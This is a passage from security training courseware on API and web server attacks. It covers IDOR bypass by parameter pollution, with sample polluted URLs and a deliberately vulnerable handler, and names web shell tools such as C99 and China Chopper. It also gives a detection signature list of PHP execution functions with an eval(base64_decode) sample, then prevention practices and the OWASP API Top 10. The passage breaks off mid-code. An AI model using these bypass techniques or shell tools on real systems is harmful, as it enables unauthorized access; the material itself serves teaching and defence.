    Server: Apache/2.4.25 (Unix) LibreSSL/2.2.7 PHP/5.6.30
    X-Powered-By: PHP/5.6.30
  Description: CORS misconfiguration allows an attacker to send a cross-domain request and read arbitrary data of other users
  Remediation: Validate the Origin header and allow only HTTP requests from trusted domains

A second finding, Broken Authentication and Session Management in http://192.168.0.4/token.php, follows in the report.

Some REST API vulnerability scanning tools are as follows:

■ Fuzzapi (https://github.com)
■ w3af (https://w3af.org)
■ AppSpider (https://www.rapid7.com)
■ Vooki (https://www.vegabird.com)
■ OWASP ZAP (https://www.zaproxy.org)


Bypassing IDOR via Parameter Pollution

Insecure direct object reference (IDOR) is a vulnerability that arises when developers disclose references to internal data enforcement objects such as database keys, directories, and other files, which can be exploited by an attacker to modify the references and gain unauthorized access to data.
For example, consider this normal request:
api.xyz.com/profile/user_id=321
The attacker manipulates the above request using parameter pollution to bypass IDOR:
api.xyz.com/profile/user_id=654&user_id=321

[Slide screenshot: Burp Suite request and response for the polluted request, reproduced as Figure 14.97 below]

Bypassing IDOR via Parameter Pollution


Insecure Direct Object Reference (IDOR) is a vulnerability that arises when developers disclose
references to internal data enforcement objects such as database keys, directories, and other
files, which can be exploited by an attacker to modify the references and gain unauthorized
access to the data. IDOR protections can be bypassed by providing a single parameter name
repeatedly but with different values.
For instance, assume that the victim's user_id is 321. Attackers can change this user_id value to
654 (another user_id value) to identify IDOR. If the page is not vulnerable to IDOR, it
generates a "401 Unauthorized" error message.
To bypass IDOR via parameter pollution, the attacker sends two user_id parameters in one
request: one carries the victim's user_id and the other carries the attacker's own user_id.
For example, consider the following request:
api.xyz.com/profile/user_id=321
The attacker manipulates the abovementioned request using parameter pollution to bypass
IDOR:
api.xyz.com/profile/user_id=654&user_id=321
When the abovementioned request is processed at the REST API endpoint, the application
verifies only the first user_id parameter, confirming that the user who is sending the request
has included his/her own user_id in the GET request.


Hence, an attacker can bypass IDOR by providing two user_id parameters: one belongs to the
victim and the other belongs to the attacker. The application is tricked into considering it a
valid request.
Attackers use tools such as Burp Suite to proxy and intercept all the traffic to REST API
endpoints. Then, they use the parameter pollution technique to send both the attacker's
user_id and the victim's user_id in the GET request to gain unauthorized access and retrieve
sensitive data from the victim's account. Using this technique, attackers can also compromise
the application's functionality, because any parameter the application accepts may be
vulnerable to this attack.
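The defect described above is that the authorization check and the data lookup read different copies of the same parameter. The following Python example, added here and not part of the original module or of any product it names, shows the flawed pattern beside a hardened handler that refuses duplicate parameter names and binds the lookup to the authenticated session. The endpoint shape, the sample profiles and the user ids 321 and 654 are taken from the text; everything else is constructed for illustration.

```python
from __future__ import annotations

from urllib.parse import parse_qs

# Constructed sample data: user 321 is the victim, user 654 the attacker.
SAMPLE_PROFILES = {
    321: {"user_id": 321, "name": "victim", "email": "victim@example.test"},
    654: {"user_id": 654, "name": "attacker", "email": "attacker@example.test"},
}


class DuplicateParameterError(ValueError):
    """Raised when a query parameter name is supplied more than once."""


def vulnerable_get_profile(session_user_id: int, query: str, profiles: dict) -> tuple[int, object]:
    """The flawed pattern described in the text: the authorization check reads the
    first user_id value while the data lookup uses the last one."""
    values = parse_qs(query, keep_blank_values=True).get("user_id", [])
    if not values or not values[0].isdigit() or int(values[0]) != session_user_id:
        return 401, "unauthorized"
    target = int(values[-1]) if values[-1].isdigit() else -1
    return (200, profiles[target]) if target in profiles else (404, "not found")


def parse_query_strict(query: str) -> dict[str, str]:
    """Parse a query string and refuse parameter pollution.

    parse_qs() keeps every value of a repeated name in a list, so
    'user_id=654&user_id=321' is visible as two values instead of silently
    collapsing to the first or the last one."""
    parsed = parse_qs(query, keep_blank_values=True, strict_parsing=True)
    for name, values in parsed.items():
        if len(values) != 1:
            raise DuplicateParameterError(f"parameter {name!r} supplied {len(values)} times")
    return {name: values[0] for name, values in parsed.items()}


def get_profile(session_user_id: int, query: str, profiles: dict) -> tuple[int, object]:
    """Hardened handler for GET /profile. Returns (status_code, body)."""
    try:
        params = parse_query_strict(query)
    except ValueError as exc:  # DuplicateParameterError is a ValueError too
        return 400, f"bad request: {exc}"
    requested = params.get("user_id", "")
    if not requested.isdigit():
        return 400, "bad request: user_id missing or not numeric"
    requested_id = int(requested)
    # The decision is bound to the authenticated session, and the value that
    # was authorized is the same value used for the lookup.
    if requested_id != session_user_id:
        return 401, "unauthorized"
    if requested_id not in profiles:
        return 404, "not found"
    return 200, profiles[requested_id]
```

A reviewer auditing an endpoint for this class of bug looks for exactly the split shown in the vulnerable handler: any place where a parameter is read twice through different helpers (a framework `get()` that returns the first value, a raw query parser that returns the last) is a candidate.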

[Figure 14.97 shows Burp Suite with an intercepted request to a profile API endpoint that carries two user_id parameters, beside the 200 OK JSON response returning the profile's photo records.]

Figure 14.97: Screenshot of Burp Suite


Web Shells

■ A web shell is a malicious piece of code or script that is developed using server-side languages such as PHP, ASP, Perl, Ruby, and Python and is then installed on a target server
■ The malicious script enables attackers to gain remote access or remote administration capabilities to the target server along with its file system
■ Attackers inject the malicious script by exploiting the most common vulnerabilities such as remote file inclusion (RFI), local file inclusion (LFI), exposed administration interfaces, and SQL injection

Web Shells
A web shell is a malicious piece of code or script that is developed using server-side languages
such as PHP, ASP, Perl, Ruby, and Python, and then installed on a target server. The malicious
script enables attackers to gain remote access or remote administration capabilities over the
target server along with its file system.
Attackers inject malicious scripts by exploiting the most common vulnerabilities such as remote
file inclusion (RFI), local file inclusion (LFI), exposed administration interfaces, and SQL
injection. Attackers can also perform XSS attacks combined with social engineering techniques
to install the malicious code.
Attackers also employ network monitoring tools (mainly Wireshark) to discover vulnerabilities
that can be exploited later for web shell injection. These vulnerabilities often lie in a web
server's software or content management system (CMS).
Web shells are used by the attacker to carry out privilege escalation and gain remote access to
download, upload, erase, and execute files on the target web server. Using the web shell,
attackers can also steal private data, damage the website's reputation via DDoS attacks, change
the structure of the website, make the web page's resources unavailable on the Internet,
maintain persistence, exfiltrate data, etc.


Figure 14.98: Illustration of a web shell


Web Shell Tools

■ b374k is a PHP-based web shell that allows attackers to monitor running processes and execute remote commands to download, upload, erase, or edit files
■ Caterpillar WebShell (https://attack.mitre.org)
■ b374k shell (https://github.com)
■ C99 (https://github.com)
■ China Chopper (https://attack.mitre.org)
■ R57 (https://github.com)

Web Shell Tools

Attackers use various web shell tools such as WSO Php Webshell (web shell by oRb), b374k,
C99, China Chopper, and R57 to gain remote control over target web servers.
■ WSO Php Webshell
Source: https://github.com
WSO Php Webshell is a web shell that allows attackers to monitor running processes
and execute remote commands to download, upload, erase, or edit files. It also allows
attackers to access and infect remote servers and access SQL databases.


Figure 14.99: Screenshot of WSO Php Webshell

Some additional web shell tools are as follows:

■ Caterpillar WebShell (https://attack.mitre.org)
■ b374k shell (https://github.com)
■ C99 (https://github.com)
■ China Chopper (https://attack.mitre.org)
■ R57 (https://github.com)


How to Prevent the Installation of a Web Shell

■ Update the application and host server's OS and apply patches regularly
■ Establish a DMZ between the web server and the internal network
■ Ensure the secure configuration of the web server using strong authentication techniques and avoid using default passwords
■ Block all unused ports and unnecessary services running on the web servers
■ Perform user input validation to control and prevent LFI and RFI vulnerabilities
■ Establish a reverse proxy service for retrieving resources and restricting admin URLs to known, legitimate ones
■ Deploy firewalls on the web server to monitor and control the network traffic based on the security rules
■ Regularly audit the accounts and review the group permissions to prevent the installation of a web shell
■ Disable all unused and risky PHP functions such as exec(), shell_exec(), and show_source()
■ Ensure that all web applications using upload forms are secure and permit only whitelisted file types
■ Use escapeshellarg() and escapeshellcmd() to ensure that the user inputs are not injected into shell commands
■ Do not install unnecessary third-party plugins and regularly check and update the plugins used

How to Prevent the Installation of a Web Shell

The following are various best practices for preventing the installation of a web shell:
■ Update the application and host server's OS and apply patches regularly to protect the
application from known bugs.
■ Establish a demilitarized zone (DMZ) between the web server and the internal network.
■ Ensure the secure configuration of the web server using strong authentication
techniques and avoid using default passwords.
■ Block all unused ports and unnecessary services running on the web servers.
■ Perform user input data validation to control and prevent local file inclusion (LFI) and
remote file inclusion (RFI) vulnerabilities.
■ Establish a reverse proxy service for retrieving resources and restricting admin URLs to
known, legitimate ones.
■ Perform regular vulnerability scans to detect the areas of threat using any web security
software.
■ Deploy firewalls on the web server to monitor and control the network traffic based on
the security rules.
■ Deactivate directory browsing in the web server to prevent directory traversal attacks.
■ Regularly audit the accounts and review the group permissions to prevent the
installation of a web shell from the web server to the internal network.
■ Disable all unused and risky PHP functions such as exec(), shell_exec(),
show_source(), proc_open(), passthru(), and pcntl_exec().

■ Use escapeshellarg() and escapeshellcmd() to ensure that user inputs are not injected
into shell commands, which avoids command execution vulnerabilities.
■ Ensure that all the web applications using upload forms are secure and permit only the
whitelisted file types.
■ Avoid using code from untrusted websites or online forums.
■ Do not install unnecessary third-party plugins and regularly check and update the
plugins used.
■ Implement a least-privilege policy to ensure that applications do not have direct access
to write or modify the web-accessible directory.
■ Implement a zero-trust architecture using software-defined networking (SDN) to
establish network communication through authorization.
■ Employ host-based security solutions that offer advanced features such as machine
learning and file reputation.
■ Deploy logging tools such as Auditd or Microsoft Sysmon to detect anomalous behavior.
■ Limit the number of ports that can access the web server.
■ Disable sensitive directories that permit uploading through media files. If disabling is not
possible, rename the directories and limit access.
■ Manually verify the source code of the files to identify any suspicious code added
recently.
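Several of the practices above (whitelisted upload types, no write access to the web-accessible directory, least privilege) come together in the upload handler. The following Python example, added here and not part of the original module, shows one way to implement them: the extension is whitelisted, the content must carry the matching file signature, double extensions are refused, and the file is written under a random name outside the web root without execute permission. The whitelist, the size limit and the sample PNG bytes are constructed assumptions.

```python
from __future__ import annotations

import os
import secrets
import tempfile
from pathlib import Path

# Whitelisted extension -> file signatures (magic bytes) the content must start with.
# Anything else, including .php, .phtml, .phar and .jsp, is refused by default.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF-",),
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # constructed limit


class UploadRejected(ValueError):
    """Raised for any upload that fails validation."""


def validate_upload(filename: str, content: bytes) -> str:
    """Return the whitelisted extension for this upload or raise UploadRejected."""
    if len(content) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    # Ignore any directory component the client sent ('../../x.png').
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith(".") or "\x00" in name:
        raise UploadRejected("invalid file name")
    suffixes = Path(name).suffixes
    if not suffixes:
        raise UploadRejected("missing extension")
    # Reject double extensions such as 'shell.php.png': some servers dispatch
    # on the first extension they recognise rather than the last one.
    if len(suffixes) > 1:
        raise UploadRejected("multiple extensions are not allowed")
    ext = suffixes[0].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} is not whitelisted")
    # The content must match the extension; a script renamed to .png fails here.
    if not any(content.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared type")
    return ext


def store_upload(storage_dir: Path, filename: str, content: bytes) -> Path:
    """Validate and write the upload under a random name in storage_dir (which
    should sit outside the web root), created without execute permission."""
    ext = validate_upload(filename, content)
    storage_dir.mkdir(parents=True, exist_ok=True)
    target = storage_dir / (secrets.token_hex(16) + ext)
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return target


def is_rejected(filename: str, content: bytes) -> bool:
    """Helper for checks: True when validate_upload() refuses the file."""
    try:
        validate_upload(filename, content)
    except UploadRejected:
        return True
    return False


def demo() -> bool:
    """Store a constructed PNG in a temporary directory and confirm that the
    stored name is random, keeps the .png extension, and is not executable."""
    png = b"\x89PNG\r\n\x1a\n" + bytes(32)  # constructed minimal PNG header
    with tempfile.TemporaryDirectory() as tmp:
        stored = store_upload(Path(tmp) / "uploads", "avatar.png", png)
        mode = stored.stat().st_mode & 0o777
        return (stored.suffix == ".png" and stored.name != "avatar.png"
                and stored.read_bytes() == png and not mode & 0o111)
```

The random file name also removes the attacker's control over the path, so even a file that slipped past validation could not be reached at a URL the attacker chose; serving the stored files through a handler that sets a fixed Content-Type, rather than directly from a web-accessible directory, closes the remaining gap.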


Web Shell Detection Tools

■ Web Shell Detector is a PHP/Python-based script that assists in scanning and discovering php/cgi(perl)/asp/aspx shells (https://www.shelldetector.com)
■ FireEye Network Security (https://www.fireeye.com)
■ NeoPI (https://github.com)
■ AntiShell Web Shell Hunter (https://antishell.com)
■ Astra (https://www.getastra.com)

Web Shell Detection Tools

Attackers often try to discover vulnerabilities in an application or web page through which they
can target the web servers. Then, they exploit those vulnerabilities to install backdoors via web
shells to gain remote access and perform malicious operations on the target server. To prevent
such attacks, regular web shell or backdoor scanning is mandatory. Security professionals use
tools such as Web Shell Detector, FireEye Network Security, and NeoPI to detect these web
shells on the target servers.
■ Web Shell Detector
Source: https://www.shelldetector.com
Web Shell Detector is a PHP/Python-based script that helps in scanning and discovering
php/cgi(perl)/asp/aspx shells. It has a web shell signature database that helps in
discovering web shells.

[Figure 14.100 shows the Web Shell Detector v1.62 web interface (shelldetect.php) after a scan: "Number of known shells in database is: 352", "File scan done, we have: 4 files to analyze", a suspicious-behavior entry for AntiSecShell.php listing the flagged functions with their line numbers (base64_decode, popen, exec, system, passthru, shell_exec, eval), and the final status "1 suspicious files found and 0 shells found".]

Figure 14.100: Screenshot of Web Shell Detector

Some web shell detection tools are listed below:

■ FireEye Network Security (https://www.fireeye.com)
■ NeoPI (https://github.com)
■ AntiShell Web Shell Hunter (https://antishell.com)
■ Astra (https://www.getastra.com)
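The Web Shell Detector output in Figure 14.100 is a signature scan: each dangerous function is reported with the line it appears on, and a file is rated by the combination of hits. The following Python example, added here and not the code of Web Shell Detector or any other tool named above, implements that idea in miniature. It flags the PHP functions the module recommends disabling, the decode primitives that typically wrap a hidden payload, and long base64-looking blobs, then rates a file as "shell" only when a decode primitive and an execute/eval primitive occur together. The signature list, thresholds and the three sample PHP files are constructed; the encoded string in the third sample decodes to the harmless statement shown in its comment.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Primitives web shells rely on: the PHP functions the text recommends disabling,
# plus the decode helpers used to hide the payload from a casual read.
EXEC_LIKE = {"exec", "shell_exec", "system", "passthru", "popen", "proc_open",
             "pcntl_exec", "eval", "assert"}
DECODE_LIKE = {"base64_decode", "gzinflate", "str_rot13"}
SIGNATURES = {name: re.compile(r"\b" + name + r"\s*\(") for name in EXEC_LIKE | DECODE_LIKE}
# A long run of base64 characters hints at an embedded encoded payload (constructed threshold).
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")


def scan_source(source: str) -> dict[str, list[int]]:
    """Return {signature_name: [line numbers]} for every hit in a PHP source."""
    hits: dict[str, list[int]] = defaultdict(list)
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits[name].append(lineno)
        if LONG_B64.search(line):
            hits["long_base64_blob"].append(lineno)
    return dict(hits)


def classify(hits: dict[str, list[int]]) -> str:
    """'shell' when a file both decodes and executes/evaluates (the classic
    eval(base64_decode(...)) shape), 'suspicious' when only one class of
    primitive is present, 'clean' when nothing matched."""
    names = set(hits)
    decodes = bool(names & DECODE_LIKE) or "long_base64_blob" in names
    executes = bool(names & EXEC_LIKE)
    if decodes and executes:
        return "shell"
    if names:
        return "suspicious"
    return "clean"


def report(files: dict[str, str]) -> dict[str, tuple[str, dict[str, list[int]]]]:
    """Scan an in-memory {filename: source} map, as a directory walk over
    *.php files would, and return {filename: (verdict, hits)}."""
    result = {}
    for name, source in files.items():
        hits = scan_source(source)
        result[name] = (classify(hits), hits)
    return result


# Constructed sample files (not real malware).
SAMPLE_FILES = {
    "index.php": "<?php\n$title = 'Home';\necho str_replace('_', ' ', $title);\n",
    "backup.php": ("<?php\n// legitimate admin helper that shells out\n"
                   "$out = shell_exec('tar czf /tmp/site.tgz /var/www/html');\necho $out;\n"),
    "cache.php": ("<?php\n// the encoded string is just: echo 'hi';\n"
                  "$p = 'ZWNobyAnaGknOw==';\neval(base64_decode($p));\n"),
}
```

A legitimate administrative script such as the constructed backup.php will always rate as suspicious under a signature scan; the point of the two-tier verdict is to keep such files from being deleted automatically while still surfacing them for the manual source review the prevention list calls for.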


Secure API Architecture

■ APIs are vulnerable to the latest and most sophisticated cyber-attacks due to various security flaws induced by poor programming practices and the transparency features of APIs
■ To safeguard APIs from these attacks, security professionals and developers need to create a secure API architecture, effective security strategies, and mitigation policies
■ API architecture is built using an API gateway consisting of firewalls that work as a server to control the traffic and detect all possible attacks
■ API gateways provide many security capabilities and controls such as access control, threat detection, confidentiality, integrity, audit management, and authentication to the API security admin

Secure API Architecture

API is a popular technology that acts as a gateway for communication and integrates different
applications using the web. API is widely employed due to its advanced techniques and its use
of the prevailing infrastructure. It is vulnerable to the latest and most sophisticated cyber-attacks
due to various security flaws induced by poor programming practices and also due to its
transparency. To safeguard APIs from these attacks, security professionals and developers need
to establish a secure API architecture, effective security strategies, and mitigation policies.
API architecture is built using an API gateway consisting of firewalls that work as a server to
control the traffic and detect all possible attacks. Executing the security policy for the API
security architecture is achieved by isolating the API implementation and API security into
different layers. These layers emphasize that API design and API security perform different
roles that require different fields of expertise. It focuses on the logical separation of concerns,
where each role emphasizes the knowledge of solving the right problem at the right time.
Under a secure API architecture, the API developer focuses only on the application domain,
ensures that all of the API is properly designed, and helps in integrating the API with different
applications. The security process of the published API is implemented by the API security
professional; hence, the API developer need not be concerned with securing the published API.
Only API security professionals have the authority to apply security policies to APIs in the
organization. These professionals mainly focus on identity, threats in the API, and data security.
Hence, they need advanced and appropriate tools to perform security tasks, which are separate
from the API implementation. Security professionals use API gateways that are hardened
appliances available in both physical and virtual forms. These gateways are installed in the
demilitarized zone (DMZ) of an organization. The API gateway also acts as a secure proxy
between the internal application and the external public Internet. It provides many security

capabilities and controls to the API security admin, such as access control, threat detection,
confidentiality, integrity, audit management, authentication, message validation, and rate-
limiting of all the APIs published by the organization.

[Figure 14.101 depicts the enterprise network with its internal API servers sitting behind the API gateway, which serves the API clients: mobile devices, cloud-driven integrations, and informal API consumers.]

Figure 14.101: Secure API architecture

Implementing Layered Security in an API

APIs are commonly used by business organizations for connecting different services and
transferring data. Attackers attempt to exploit API vulnerabilities such as broken authentication
and security misconfiguration for malicious purposes. Exposed APIs can become a major cause
of the breach of sensitive data such as personally identifiable information (PII) to the public.
Hence, developers must use multiple security layers to avoid API exposure and data breaches.
Considering the scenario of an API that fetches the transactions of a company, developers and
security experts can implement the following layer-based security for the API:
■ Layer one

The API validates the user to check whether the entity is authorized by the company. In
this situation, the developers can use API security, by which an exception will be
returned if the user is not authorized or permitted. For example, the API may throw a
"Company Not Found" exception. This helps the API developer identify any invalid
company.


■ Layer two
In this layer, middleware can be used by the API to provide a query plan by calling the
data layer. The database layer declares a filter for the company ID before sending a
request. Developers can include a security mechanism to return an exception such as
"Unsafe Data Query" in the absence of such a filter.
■ Layer three
In this layer, an SQL join must be used to query an SQL database using the data link layer
based on API calls. This helps in ensuring that all the queries match the user responsible
for the API call. Moreover, this verifies the user context against the data stored by
the SQL layer.
■ Layer four
This layer creates a mapper layer that enables the conversion of all the database records
into different user-visible models. This technique can be used to keep sensitive data
such as implementation details from the public or customers.
■ Layer five
The response filter of the API verifies the models that are generated by the mapper
layer above. After the response filter declares that the records match the user calling
that API, it allows the user to observe a specific account. This layer discards the data
models that are not clearly flagged as belonging to the customer's account, double-checking
the work of the other layers.
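The five layers above are easier to reason about when each one is a separate function that can fail on its own. The following Python example, added here and not part of the original module, models the company-transactions scenario in memory: layer one raises "Company Not Found" or a permission error, layer two refuses any query plan without a company filter ("Unsafe Data Query"), layer three applies that filter the way a join on the caller's company would, layer four maps records to views that omit the implementation detail, and layer five discards any view whose owner does not match the caller. The company, user and transaction data, the field names and the exception classes are all constructed assumptions.

```python
from __future__ import annotations

from dataclasses import dataclass


class CompanyNotFound(Exception):
    """Layer one: the caller asked for a company the system does not know."""


class UnsafeDataQuery(Exception):
    """Layer two: a query plan reached the data layer without a company filter."""


@dataclass(frozen=True)
class TransactionRow:
    """A raw database record; ledger_node is an implementation detail."""
    id: int
    company_id: int
    amount_cents: int
    ledger_node: str


@dataclass(frozen=True)
class TransactionView:
    """The user-visible model produced by the mapper (layer four)."""
    id: int
    amount: str


@dataclass(frozen=True)
class QueryPlan:
    table: str
    filters: dict


# Constructed sample data.
COMPANIES = {1: "Acme", 2: "Globex"}
USER_COMPANY = {"alice": 1, "bob": 2}
TRANSACTIONS = [
    TransactionRow(10, 1, 1250, "ledger-a"),
    TransactionRow(11, 2, 99900, "ledger-b"),
    TransactionRow(12, 1, 480, "ledger-a"),
]


def authorize(user: str, company_id: int) -> None:
    """Layer one: is this entity authorized for this company?"""
    if company_id not in COMPANIES:
        raise CompanyNotFound(f"company {company_id}")
    if USER_COMPANY.get(user) != company_id:
        raise PermissionError(f"{user} is not a member of company {company_id}")


def build_plan(company_id: int) -> QueryPlan:
    """Layer two: middleware declares the company filter before any data access."""
    return QueryPlan("transactions", {"company_id": company_id})


def run_plan(plan: QueryPlan) -> list[TransactionRow]:
    """Layers two and three: refuse unfiltered plans, then apply the filter the
    way a join on the caller's company would in SQL (simulated in memory)."""
    if "company_id" not in plan.filters:
        raise UnsafeDataQuery(f"plan for {plan.table} has no company filter")
    return [r for r in TRANSACTIONS if r.company_id == plan.filters["company_id"]]


def to_view(row: TransactionRow) -> tuple[int, TransactionView]:
    """Layer four: map a record to a view that omits ledger_node; the owning
    company is carried alongside so the response filter can re-check it."""
    return row.company_id, TransactionView(row.id, f"{row.amount_cents / 100:.2f}")


def response_filter(tagged: list[tuple[int, TransactionView]], company_id: int) -> list[TransactionView]:
    """Layer five: drop any model whose owner is not the calling company,
    double-checking the work of the layers above."""
    return [view for owner, view in tagged if owner == company_id]


def get_transactions(user: str, company_id: int) -> list[TransactionView]:
    """The API handler: every layer runs on every call."""
    authorize(user, company_id)
    rows = run_plan(build_plan(company_id))
    return response_filter([to_view(r) for r in rows], company_id)


def raises(exc_type: type, fn, *args) -> bool:
    """Helper for checks: True when fn(*args) raises exc_type."""
    try:
        fn(*args)
    except exc_type:
        return True
    return False
```

Layer five looks redundant next to layer three, and in normal operation it is: its value is that a bug introduced later in the data layer (a refactor that drops the join, a cached plan built for another caller) is caught before the response leaves the process rather than showing up as a data breach.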


API Security Risks and Solutions

[The slide summarizes the OWASP Top 10 API security risks (API1 through API10) together with the recommended solutions for each; the full content is given in Table 14.5 below.]

API Security Risks and Solutions

Source: https://owasp.org
According to OWASP, the following are the top 10 API Security Risks and Solutions:

API1: Broken Object Level Authorization
■ Perform object-level authorization checks for every function accessing the data source with input from the user
■ Scrutinize the implementation of the authorization policies
■ Implement a robust access control policy for random and unpredictable object ID values

API2: Broken User Authentication
■ Use standard and uniform authentication mechanisms for all the API endpoints
■ Examine and implement the authentication requirements within the Application Security Verification Standard (ASVS)
■ Make sure to have strong business requirements before exposing unauthenticated API endpoints publicly

API3: Excessive Data Exposure
■ Ensure that proper filtering is performed on the server side and not on the client side
■ Scrutinize the data flow from the endpoint to the client

API4: Lack of Resources and Rate Limiting
■ Ensure appropriate rate-limiting controls are in place
■ Use the OWASP Automated Threat Handbook as a knowledge source for preventing bots from consuming your resources

API5: Broken Function Level Authorization
■ Avoid function-level authorization
■ Use simple and standard authorization and enable the default setting to deny

API6: Mass Assignment
■ Do not expose the internal variable or object names as inputs
■ Ensure whitelisting of all the properties that the client can update

API7: Security Misconfiguration
■ Perform the hardening process against the API continuously
■ Use scanning tools and human reviews to examine the entire API stack for security misconfigurations

API8: Injection
■ Perform input validation and whitelisting
■ Implement a parameterized interface for processing inbound API requests
■ Ensure that the filtering logic limits the number of records returned

API9: Improper Assets Management
■ Maintain a proper inventory of all API environments including production, staging, testing, and development
■ Conduct a security review of all APIs, mainly focusing on standardizing functions
■ Create a risk level ranking of the APIs and improve the security functions for APIs having a higher risk level

API10: Insufficient Logging and Monitoring
■ Use a standard logging format for all the APIs that support incident response activities
■ Regularly monitor all the API endpoints in all phases of production, staging, testing, and development

Table 14.5: OWASP Top 10 API Security Risks and Solutions


Best Practices for API Security

■ Use server-generated tokens embedded in HTML as hidden fields for validating the incoming requests
■ Sanitize the data to eliminate malicious scripts and properly validate the user input
■ Use an optimized firewall to ensure that all the unused, unnecessary files and permissive rules are revoked
■ Use IP whitelisting to create a list of trusted IP addresses to access APIs and to limit access to trusted users
■ Use the rate-limiting feature to limit the number of API calls made by a client in a particular time frame
■ Implement a pagination technique that can divide a single response into several fragments
■ Use parameterized statements in SQL queries to prevent inputs that include entire SQL statements
■ Conduct regular security assessments to secure all the API endpoints using automated tools
■ Use tokens to establish trusted identities and to control access to services and resources
■ Use signatures to ensure that only authorized users can decrypt or modify data
■ Employ packet sniffers to track events related to information disclosure and to detect insecure API calls
■ Use techniques such as quotas and throttling to control and track the API usage
■ Implement API gateways to authenticate the traffic and control and analyze the usage of APIs
■ Implement MFA and use authentication protocols such as AppToken, OAuth2, and OpenID Connect

Best Practices for API Security

Various best practices for securing APIs against cyberattacks are as follows:
■ Use the HTTPS protocol through SSL/TLS certificates that support encryption techniques
and provide a secure connection between the server and client.
■ Use server-generated tokens embedded in HTML as hidden fields for validating the
incoming request and to check if it is from an authenticated source.
■ Sanitize the data to eliminate malicious scripts and properly validate the user input.
■ Use an optimized firewall to ensure that all the unused, unnecessary files and
permissive rules are revoked.
■ Use IP whitelisting to create a list of trusted IP addresses or IP ranges to access APIs and
to limit access to trusted users or components only.
■ Use the rate-limiting feature to limit the number of API calls made by the client in a
particular time frame.
■ Maintain and monitor access logs regularly to help in detecting anomalies and to take
precautionary measures in the future.
■ Implement a pagination technique that can divide a single response into several
fragments so that the payloads are not oversized.
■ Use parameterized statements in SQL queries to prevent inputs that include entire SQL
statements.
■ Perform input validation on the server side instead of the client side to prevent
bypassing attacks.

■ Conduct regular security assessments to secure all the API endpoints using automated
tools.
■ Regularly monitor and perform continuous auditing of the API and analyze the
workflows to prevent any attacks.
■ Use tokens to establish trusted identities and to control access to services and
resources.
■ Use signatures to ensure that only authorized users can decrypt or modify data.
■ Employ packet sniffers to track events related to information disclosure and to detect
insecure API calls.
■ Use techniques such as quotas and throttling to control and track the API usage and to
set the API request limit.
■ Implement API gateways to authenticate the traffic and control and analyze the usage of
APIs.
■ Implement advanced techniques to prevent sophisticated human-like bots from
accessing the APIs.
■ Implement multi-factor authentication (MFA) and use authentication protocols such as
AppToken, OAuth2, and OpenID Connect to authenticate the users and applications in
the API.
■ Document audit logs before and after every security event, and sanitize the log data to
prevent log injection attacks.
■ Use SOAP APIs with in-built security features instead of conventional design-based REST
APIs.
■ Confine the API response data to the requested resource permission status, instead of
sharing an excessive amount of secret data through status messages or resource replies.
■ Use WAF security along with TLS/SSL for securing the APIs and reducing the attacks
based on web traffic and script injections.
■ Ensure that all the requests made from stateless communication APIs such as REST API
are authorized separately, even if they originated from the same user.
■ Employ advanced routing and controlling technologies such as service mesh technology
to manage multi-service authentication and access control.
■ Insist that the API developers consider the latest security vulnerabilities and risks related
to APIs through open-source materials, articles, and blogs.
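Three of the practices above (rate limiting and quotas, signatures that only authorized parties can produce, separate authorization of every stateless request) are shown together in the following Python example, which is added here and is not code from the original module. A token-bucket limiter keyed on the peer address runs first so that a flood is refused cheaply; each request then carries an HMAC-SHA256 signature over its timestamp, method, path and body, verified with a constant-time comparison after the timestamp is checked against a window. The same timestamp-window and constant-time-compare checks apply to the webhook signing practices discussed later in this module. The secret, the window size, the bucket parameters and the request values are constructed assumptions.

```python
from __future__ import annotations

import hashlib
import hmac
import time

MAX_CLOCK_SKEW_SECONDS = 300  # constructed: window inside which a signed timestamp is accepted
DEMO_SECRET = b"constructed-demo-secret"  # constructed; in practice it comes from a secret store


def sign_request(secret: bytes, method: str, path: str, body: bytes, timestamp: int) -> str:
    """HMAC-SHA256 over timestamp, method, path and body. The timestamp is part of
    the signed data, so a captured request cannot be replayed outside the window
    and the signature cannot be moved to a different path or body."""
    message = f"{timestamp}\n{method.upper()}\n{path}\n".encode() + body
    return hmac.new(secret, message, hashlib.sha256).hexdigest()


def verify_request(secret: bytes, method: str, path: str, body: bytes,
                   timestamp: int, signature: str, now: float | None = None) -> tuple[bool, str]:
    """Check the timestamp window first, then the signature with a constant-time
    comparison so the check does not leak how many leading bytes matched."""
    now = time.time() if now is None else now
    if abs(now - timestamp) > MAX_CLOCK_SKEW_SECONDS:
        return False, "timestamp outside accepted window"
    expected = sign_request(secret, method, path, body, timestamp)
    if not hmac.compare_digest(expected, signature):
        return False, "bad signature"
    return True, "ok"


class TokenBucket:
    """Per-key rate limiter: each key holds up to `capacity` tokens refilled at
    `refill_per_second`; every request costs one token."""

    def __init__(self, capacity: int, refill_per_second: float) -> None:
        self.capacity = capacity
        self.refill = refill_per_second
        self.state: dict[str, tuple[float, float]] = {}  # key -> (tokens, last_seen)

    def allow(self, key: str, now: float) -> bool:
        tokens, last = self.state.get(key, (float(self.capacity), now))
        tokens = min(self.capacity, tokens + (now - last) * self.refill)
        if tokens < 1.0:
            self.state[key] = (tokens, now)
            return False
        self.state[key] = (tokens - 1.0, now)
        return True


class ApiGuard:
    """Front door for an API endpoint: rate limit by peer address, then verify the
    request signature. Rejected requests still consume a token, so a client that
    keeps sending bad signatures is throttled like any other flood."""

    def __init__(self, secret: bytes, capacity: int = 60, refill_per_second: float = 1.0) -> None:
        self.secret = secret
        self.limiter = TokenBucket(capacity, refill_per_second)

    def handle(self, peer_ip: str, method: str, path: str, body: bytes,
               timestamp: int, signature: str, now: float) -> tuple[int, str]:
        if not self.limiter.allow(peer_ip, now):
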